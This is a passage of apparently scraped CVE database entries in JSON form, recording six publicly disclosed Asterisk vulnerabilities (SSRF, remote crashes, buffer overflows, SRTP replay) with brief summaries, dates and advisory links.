                "url": "http://packetstormsecurity.com/files/166745/Asterisk-Project-Security-Advisory-AST-2022-002.html"
              },
              {
                "name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
                "tags": [
                  "mailing-list",
                  "x_transferred"
                ],
                "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
              },
              {
                "name": "DSA-5285",
                "tags": [
                  "vendor-advisory",
                  "x_transferred"
                ],
                "url": "https://www.debian.org/security/2022/dsa-5285"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "An SSRF issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it\u0027s possible to send arbitrary requests (such as GET) to interfaces such as localhost by using the Identity header. This is fixed in 16.25.2, 18.11.2, and 19.3.2."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2022-11-18T00:00:00.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "url": "https://downloads.asterisk.org/pub/security/"
            },
            {
              "url": "https://downloads.asterisk.org/pub/security/AST-2022-002.html"
            },
            {
              "url": "http://packetstormsecurity.com/files/166745/Asterisk-Project-Security-Advisory-AST-2022-002.html"
            },
            {
              "name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
              "tags": [
                "mailing-list"
              ],
              "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
            },
            {
              "name": "DSA-5285",
              "tags": [
                "vendor-advisory"
              ],
              "url": "https://www.debian.org/security/2022/dsa-5285"
            }
          ]
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2022-26499",
        "datePublished": "2022-04-15T00:00:00.000Z",
        "dateReserved": "2022-03-06T00:00:00.000Z",
        "dateUpdated": "2024-08-03T05:03:32.912Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2021-32558 (GCVE-0-2021-32558)

    Vulnerability from cvelistv5 – Published: 2021-07-27 05:19 – Updated: 2024-08-03 23:25
    VLAI
    Summary
    An issue was discovered in Sangoma Asterisk 13.x before 13.38.3, 16.x before 16.19.1, 17.x before 17.9.4, and 18.x before 18.5.1, and Certified Asterisk before 16.8-cert10. If the IAX2 channel driver receives a packet that contains an unsupported media format, a crash can occur.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-03T23:25:30.855Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "name": "20210722 AST-2021-008: Remote crash when using IAX2 channel driver",
                "tags": [
                  "mailing-list",
                  "x_refsource_FULLDISC",
                  "x_transferred"
                ],
                "url": "http://seclists.org/fulldisclosure/2021/Jul/49"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://downloads.asterisk.org/pub/security/AST-2021-008.html"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29392"
              },
              {
                "name": "[debian-lts-announce] 20210804 [SECURITY] [DLA 2729-1] asterisk security update",
                "tags": [
                  "mailing-list",
                  "x_refsource_MLIST",
                  "x_transferred"
                ],
                "url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00005.html"
              },
              {
                "name": "DSA-4999",
                "tags": [
                  "vendor-advisory",
                  "x_refsource_DEBIAN",
                  "x_transferred"
                ],
                "url": "https://www.debian.org/security/2021/dsa-4999"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "An issue was discovered in Sangoma Asterisk 13.x before 13.38.3, 16.x before 16.19.1, 17.x before 17.9.4, and 18.x before 18.5.1, and Certified Asterisk before 16.8-cert10. If the IAX2 channel driver receives a packet that contains an unsupported media format, a crash can occur."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2021-11-02T10:06:13.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "name": "20210722 AST-2021-008: Remote crash when using IAX2 channel driver",
              "tags": [
                "mailing-list",
                "x_refsource_FULLDISC"
              ],
              "url": "http://seclists.org/fulldisclosure/2021/Jul/49"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://downloads.asterisk.org/pub/security/AST-2021-008.html"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29392"
            },
            {
              "name": "[debian-lts-announce] 20210804 [SECURITY] [DLA 2729-1] asterisk security update",
              "tags": [
                "mailing-list",
                "x_refsource_MLIST"
              ],
              "url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00005.html"
            },
            {
              "name": "DSA-4999",
              "tags": [
                "vendor-advisory",
                "x_refsource_DEBIAN"
              ],
              "url": "https://www.debian.org/security/2021/dsa-4999"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2021-32558",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "An issue was discovered in Sangoma Asterisk 13.x before 13.38.3, 16.x before 16.19.1, 17.x before 17.9.4, and 18.x before 18.5.1, and Certified Asterisk before 16.8-cert10. If the IAX2 channel driver receives a packet that contains an unsupported media format, a crash can occur."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "20210722 AST-2021-008: Remote crash when using IAX2 channel driver",
                  "refsource": "FULLDISC",
                  "url": "http://seclists.org/fulldisclosure/2021/Jul/49"
                },
                {
                  "name": "http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html",
                  "refsource": "MISC",
                  "url": "http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html"
                },
                {
                  "name": "https://downloads.asterisk.org/pub/security/AST-2021-008.html",
                  "refsource": "MISC",
                  "url": "https://downloads.asterisk.org/pub/security/AST-2021-008.html"
                },
                {
                  "name": "https://issues.asterisk.org/jira/browse/ASTERISK-29392",
                  "refsource": "MISC",
                  "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29392"
                },
                {
                  "name": "[debian-lts-announce] 20210804 [SECURITY] [DLA 2729-1] asterisk security update",
                  "refsource": "MLIST",
                  "url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00005.html"
                },
                {
                  "name": "DSA-4999",
                  "refsource": "DEBIAN",
                  "url": "https://www.debian.org/security/2021/dsa-4999"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2021-32558",
        "datePublished": "2021-07-27T05:19:34.000Z",
        "dateReserved": "2021-05-11T00:00:00.000Z",
        "dateUpdated": "2024-08-03T23:25:30.855Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2021-31878 (GCVE-0-2021-31878)

    Vulnerability from cvelistv5 – Published: 2021-07-27 05:17 – Updated: 2024-08-03 23:10
    VLAI
    Summary
    An issue was discovered in PJSIP in Asterisk before 16.19.1 and before 18.5.1. To exploit, a re-INVITE without SDP must be received after Asterisk has sent a BYE request.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-03T23:10:30.837Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "name": "20210722 AST-2021-007: Remote Crash Vulnerability in PJSIP channel driver",
                "tags": [
                  "mailing-list",
                  "x_refsource_FULLDISC",
                  "x_transferred"
                ],
                "url": "http://seclists.org/fulldisclosure/2021/Jul/48"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://downloads.asterisk.org/pub/security/AST-2021-007.html"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29381"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://downloads.digium.com/pub/security/AST-2021-007.html"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "An issue was discovered in PJSIP in Asterisk before 16.19.1 and before 18.5.1. To exploit, a re-INVITE without SDP must be received after Asterisk has sent a BYE request."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2021-07-27T11:10:28.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "name": "20210722 AST-2021-007: Remote Crash Vulnerability in PJSIP channel driver",
              "tags": [
                "mailing-list",
                "x_refsource_FULLDISC"
              ],
              "url": "http://seclists.org/fulldisclosure/2021/Jul/48"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://downloads.asterisk.org/pub/security/AST-2021-007.html"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29381"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://downloads.digium.com/pub/security/AST-2021-007.html"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2021-31878",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "An issue was discovered in PJSIP in Asterisk before 16.19.1 and before 18.5.1. To exploit, a re-INVITE without SDP must be received after Asterisk has sent a BYE request."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "20210722 AST-2021-007: Remote Crash Vulnerability in PJSIP channel driver",
                  "refsource": "FULLDISC",
                  "url": "http://seclists.org/fulldisclosure/2021/Jul/48"
                },
                {
                  "name": "http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html",
                  "refsource": "MISC",
                  "url": "http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html"
                },
                {
                  "name": "http://downloads.asterisk.org/pub/security/AST-2021-007.html",
                  "refsource": "MISC",
                  "url": "http://downloads.asterisk.org/pub/security/AST-2021-007.html"
                },
                {
                  "name": "https://issues.asterisk.org/jira/browse/ASTERISK-29381",
                  "refsource": "MISC",
                  "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29381"
                },
                {
                  "name": "https://downloads.digium.com/pub/security/AST-2021-007.html",
                  "refsource": "MISC",
                  "url": "https://downloads.digium.com/pub/security/AST-2021-007.html"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2021-31878",
        "datePublished": "2021-07-27T05:17:05.000Z",
        "dateReserved": "2021-04-29T00:00:00.000Z",
        "dateUpdated": "2024-08-03T23:10:30.837Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2021-26713 (GCVE-0-2021-26713)

    Vulnerability from cvelistv5 – Published: 2021-02-19 19:30 – Updated: 2024-08-03 20:33
    VLAI
    Summary
    A stack-based buffer overflow in res_rtp_asterisk.c in Sangoma Asterisk before 16.16.1, 17.x before 17.9.2, and 18.x before 18.2.1 and Certified Asterisk before 16.8-cert6 allows an authenticated WebRTC client to cause an Asterisk crash by sending multiple hold/unhold requests in quick succession. This is caused by a signedness comparison mismatch.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-03T20:33:40.660Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://downloads.asterisk.org/pub/security/"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://downloads.asterisk.org/pub/security/AST-2021-004.html"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29205"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "A stack-based buffer overflow in res_rtp_asterisk.c in Sangoma Asterisk before 16.16.1, 17.x before 17.9.2, and 18.x before 18.2.1 and Certified Asterisk before 16.8-cert6 allows an authenticated WebRTC client to cause an Asterisk crash by sending multiple hold/unhold requests in quick succession. This is caused by a signedness comparison mismatch."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2021-02-19T19:30:30.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://downloads.asterisk.org/pub/security/"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://downloads.asterisk.org/pub/security/AST-2021-004.html"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29205"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2021-26713",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "A stack-based buffer overflow in res_rtp_asterisk.c in Sangoma Asterisk before 16.16.1, 17.x before 17.9.2, and 18.x before 18.2.1 and Certified Asterisk before 16.8-cert6 allows an authenticated WebRTC client to cause an Asterisk crash by sending multiple hold/unhold requests in quick succession. This is caused by a signedness comparison mismatch."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "https://downloads.asterisk.org/pub/security/",
                  "refsource": "MISC",
                  "url": "https://downloads.asterisk.org/pub/security/"
                },
                {
                  "name": "https://downloads.asterisk.org/pub/security/AST-2021-004.html",
                  "refsource": "MISC",
                  "url": "https://downloads.asterisk.org/pub/security/AST-2021-004.html"
                },
                {
                  "name": "https://issues.asterisk.org/jira/browse/ASTERISK-29205",
                  "refsource": "MISC",
                  "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29205"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2021-26713",
        "datePublished": "2021-02-19T19:30:30.000Z",
        "dateReserved": "2021-02-05T00:00:00.000Z",
        "dateUpdated": "2024-08-03T20:33:40.660Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2021-26712 (GCVE-0-2021-26712)

    Vulnerability from cvelistv5 – Published: 2021-02-18 20:10 – Updated: 2024-08-03 20:33
    VLAI
    Summary
    Incorrect access controls in res_srtp.c in Sangoma Asterisk 13.38.1, 16.16.0, 17.9.1, and 18.2.0 and Certified Asterisk 16.8-cert5 allow a remote unauthenticated attacker to prematurely terminate secure calls by replaying SRTP packets.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-03T20:33:40.803Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://downloads.asterisk.org/pub/security/"
              },
              {
                "name": "20210218 AST-2021-003: Remote attacker could prematurely tear down SRTP calls",
                "tags": [
                  "mailing-list",
                  "x_refsource_FULLDISC",
                  "x_transferred"
                ],
                "url": "http://seclists.org/fulldisclosure/2021/Feb/59"
              },
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "https://downloads.asterisk.org/pub/security/AST-2021-003.html"
              },
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29260"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://packetstormsecurity.com/files/161473/Asterisk-Project-Security-Advisory-AST-2021-003.html"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "Incorrect access controls in res_srtp.c in Sangoma Asterisk 13.38.1, 16.16.0, 17.9.1, and 18.2.0 and Certified Asterisk 16.8-cert5 allow a remote unauthenticated attacker to prematurely terminate secure calls by replaying SRTP packets."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2021-02-19T15:06:09.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://downloads.asterisk.org/pub/security/"
            },
            {
              "name": "20210218 AST-2021-003: Remote attacker could prematurely tear down SRTP calls",
              "tags": [
                "mailing-list",
                "x_refsource_FULLDISC"
              ],
              "url": "http://seclists.org/fulldisclosure/2021/Feb/59"
            },
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "https://downloads.asterisk.org/pub/security/AST-2021-003.html"
            },
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29260"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://packetstormsecurity.com/files/161473/Asterisk-Project-Security-Advisory-AST-2021-003.html"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2021-26712",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Incorrect access controls in res_srtp.c in Sangoma Asterisk 13.38.1, 16.16.0, 17.9.1, and 18.2.0 and Certified Asterisk 16.8-cert5 allow a remote unauthenticated attacker to prematurely terminate secure calls by replaying SRTP packets."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "https://downloads.asterisk.org/pub/security/",
                  "refsource": "MISC",
                  "url": "https://downloads.asterisk.org/pub/security/"
                },
                {
                  "name": "20210218 AST-2021-003: Remote attacker could prematurely tear down SRTP calls",
                  "refsource": "FULLDISC",
                  "url": "http://seclists.org/fulldisclosure/2021/Feb/59"
                },
                {
                  "name": "https://downloads.asterisk.org/pub/security/AST-2021-003.html",
                  "refsource": "CONFIRM",
                  "url": "https://downloads.asterisk.org/pub/security/AST-2021-003.html"
                },
                {
                  "name": "https://issues.asterisk.org/jira/browse/ASTERISK-29260",
                  "refsource": "CONFIRM",
                  "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29260"
                },
                {
                  "name": "http://packetstormsecurity.com/files/161473/Asterisk-Project-Security-Advisory-AST-2021-003.html",
                  "refsource": "MISC",
                  "url": "http://packetstormsecurity.com/files/161473/Asterisk-Project-Security-Advisory-AST-2021-003.html"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2021-26712",
        "datePublished": "2021-02-18T20:10:20.000Z",
        "dateReserved": "2021-02-05T00:00:00.000Z",
        "dateUpdated": "2024-08-03T20:33:40.803Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2020-35776 (GCVE-0-2020-35776)

    Vulnerability from cvelistv5 – Published: 2021-02-18 19:57 – Updated: 2024-08-04 17:09
    VLAI
    Summary
    A buffer overflow in res_pjsip_diversion.c in Sangoma Asterisk versions 13.38.1, 16.15.1, 17.9.1, and 18.1.1 allows remote attacker to crash Asterisk by deliberately misusing SIP 181 responses.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-04T17:09:15.196Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://issues.asterisk.org/"
              },
              {
                "name": "20210218 AST-2021-001: Remote crash in res_pjsip_diversion",
                "tags": [
                  "mailing-list",
                  "x_refsource_FULLDISC",
                  "x_transferred"
                ],
                "url": "http://seclists.org/fulldisclosure/2021/Feb/57"
              },
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "https://downloads.asterisk.org/pub/security/AST-2021-001.html"
              },
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29227"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://packetstormsecurity.com/files/161470/Asterisk-Project-Security-Advisory-AST-2021-001.html"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "A buffer overflow in res_pjsip_diversion.c in Sangoma Asterisk versions 13.38.1, 16.15.1, 17.9.1, and 18.1.1 allows remote attacker to crash Asterisk by deliberately misusing SIP 181 responses."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2021-02-19T15:06:11.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://issues.asterisk.org/"
            },
            {
              "name": "20210218 AST-2021-001: Remote crash in res_pjsip_diversion",
              "tags": [
                "mailing-list",
                "x_refsource_FULLDISC"
              ],
              "url": "http://seclists.org/fulldisclosure/2021/Feb/57"
            },
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "https://downloads.asterisk.org/pub/security/AST-2021-001.html"
            },
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29227"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://packetstormsecurity.com/files/161470/Asterisk-Project-Security-Advisory-AST-2021-001.html"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2020-35776",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "A buffer overflow in res_pjsip_diversion.c in Sangoma Asterisk versions 13.38.1, 16.15.1, 17.9.1, and 18.1.1 allows remote attacker to crash Asterisk by deliberately misusing SIP 181 responses."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "https://issues.asterisk.org/",
                  "refsource": "MISC",
                  "url": "https://issues.asterisk.org/"
                },
                {
                  "name": "20210218 AST-2021-001: Remote crash in res_pjsip_diversion",
                  "refsource": "FULLDISC",
                  "url": "http://seclists.org/fulldisclosure/2021/Feb/57"
                },
                {
                  "name": "https://downloads.asterisk.org/pub/security/AST-2021-001.html",
                  "refsource": "CONFIRM",
                  "url": "https://downloads.asterisk.org/pub/security/AST-2021-001.html"
                },
                {
                  "name": "https://issues.asterisk.org/jira/browse/ASTERISK-29227",
                  "refsource": "CONFIRM",
                  "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29227"
                },
                {
                  "name": "http://packetstormsecurity.com/files/161470/Asterisk-Project-Security-Advisory-AST-2021-001.html",
                  "refsource": "MISC",
                  "url": "http://packetstormsecurity.com/files/161470/Asterisk-Project-Security-Advisory-AST-2021-001.html"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2020-35776",
        "datePublished": "2021-02-18T19:57:57.000Z",
        "dateReserved": "2020-12-29T00:00:00.000Z",
        "dateUpdated": "2024-08-04T17:09:15.196Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }